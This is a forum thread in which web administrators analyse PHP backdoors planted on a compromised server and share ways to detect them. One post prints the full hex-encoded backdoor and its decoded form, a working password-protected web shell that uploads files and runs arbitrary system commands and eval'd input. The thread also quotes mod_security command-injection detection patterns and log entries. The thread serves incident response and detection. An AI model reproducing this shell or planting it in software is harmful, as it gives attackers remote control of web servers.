Quote:
Originally Posted by hjnet
Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect
|
Yes, all backdoors had the same strings starting with 6966202873 in my case.
Here is the full php code:
Quote:
echo " ";
$s = "696620287374726C656E28245F504F53545B6363635D293D3 D30297B69662028245F504F53545B706173735D213D2731323 327297B6563686F20273C68746D6C3E3C626F6479206267636 F6C6F723D23424246464242206F6E6C6F61643D22646F63756 D656E742E6D79662E706173732E666F63757328293B223E3C6 66F726D206D6574686F643D504F53543E3C696E707574206E6 16D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F6 8746D6C3E273B6578697428293B7D6563686F20273C68746D6 C3E3C626F6479206267636F6C6F723D23424246464242206F6 E6C6F61643D22646F63756D656E742E6D79662E63632E666F6 3757328293B223E273B6563686F20273C666F726D206E616D6 53D6D7966206D6574686F643D504F535420656E63747970653 D226D756C7469706172742F666F726D2D64617461223E3C696 E70757420747970653D68696464656E206E616D653D7061737 32076616C75653D272E245F504F53545B706173735D2E273E3 C696E70757420747970653D66696C65206E616D653D7570666 96C653E3C696E707574206E616D653D6E65776E616D653E3C6 96E70757420747970653D7375626D69743E3C62723E273B656 3686F20273C696E707574206E616D653D63632073697A653D3 7332076616C75653D22272E7374726970736C6173686573282 45F504F53545B63635D292E27223E3C2F666F726D3E273B656 3686F20273C7072653E273B20696620286D6F76655F75706C6 F616465645F66696C6528245F46494C45535B27757066696C6 5275D5B27746D705F6E616D65275D2C20245F504F53545B6E6 5776E616D655D2929207B202F2A6563686F202253656E742E3 C62723E5C6E223B2A2F207D69662028245F504F53545B6D666 96C655D29207B2020202466703D666F70656E28245F504F535 45B6E65776E616D655D2C277727293B202020666F7228246B3 D303B20246B3C7374726C656E28245F504F53545B6D66696C6 55D293B20246B2B3D322920207B20202020246363203D20737 56273747228245F504F53545B6D66696C655D2C246B2C32293 B20202020246363203D20273078272E2463633B20202020202 02020246363203D20726F756E6428246363293B20202020246 363203D2063687228246363293B20202020667772697465282 466702C246363293B2020207D202066636C6F7365282466702 93B207D24636F3D7374726970736C617368657328245F504F5 3545B63635D293B20246F7574203D2027273B69662866756E6 374696F6E5F6578697374732827657865632729297B6578656 32824636F2C246F7574293B246F7574203D206A6F696E28225 C6E222C246F7574293B7D656C736569662866756E6374696F6 E5F657869737473282770617373746872752729297B6F625F7 37461727428293B70617373746872752824636F293B246F757 4203D206F625F6765745F636F6E74656E747328293B6F625F6 56E645F636C65616E28293B7D656C736569662866756E63746 96F6E5F657869737473282773797374656D2729297B6F625F7 37461727428293B73797374656D2824636F293B246F7574203 D206F625F6765745F636F6E74656E747328293B6F625F656E6 45F636C65616E28293B7D656C736569662866756E6374696F6 E5F65786973747328277368656C6C5F657865632729297B246 F7574203D207368656C6C5F657865632824636F293B7D656C7 36569662869735F7265736F75726365282466203D20706F706 56E2824636F2C2272222929297B246F7574203D2022223B776 8696C6528214066656F662824662929207B20246F7574202E3 D2066726561642824662C31303234293B7D70636C6F7365282 466293B7D656C7365207B246F75743D276578206661696C656 4273B7D6563686F20246F75743B6563686F20273C2F7072653 E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7 D20656C7365207B6966286765745F6D616769635F71756F746 5735F6770632829297B6576616C287374726970736C6173686 57328245F504F53545B6363635D29293B7D20656C7365207B6 576616C28245F504F53545B6363635D293B7D7D";
$sss = "";
$k = 0;
for ( ; $k < strlen( $s ); $k += 2 )
{
$ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
$sss .= $ss;
}
eval( $sss );
$ssss = "************************************************* ************************************************** *********************************";
echo "\r\n";
?>
|
Code decripted :
Quote:
|
if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru' )){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_PO ST[ccc]));} else {eval($_POST[ccc]);}}
|
I found out it's just another ordinary blind SQL injection attack that has this pattern:
Quote:
|
\\b(??:s(?:ys(???:process|tabl)e|filegroup| object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubst r(?:ing)?)|user_(???:constrain|objec)t|tab(?:_ column|le)|ind_column|user)s|password|group)|a(?:t t(?:rel|typ)id|ll_objects)|object_(??:nam|typ)e| id)| ..." at ARGS:ccc.
|
I don't think this string can't be randomized since it is phpshell and uses 'shell_exec' function.
or if you had installed mod_security, look into /var/log/httpd/modsec_debug.log.
whatever code they have on file, mod_security blocks system calls via web.
you will find a bunch of these logs :
Quote:
|
[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.e xe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "domain.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
|
so analyze the log file and catch all php files sending system commands. then you can compare all strings.
And for infected web files, yes looks like the backdoors didn't inject the same js code. each code has different encrypted malware url. So classify all html/php files that have 777 permision then abstract those different codes and make your own grep strings for full search.
Luckly, I had only one common string.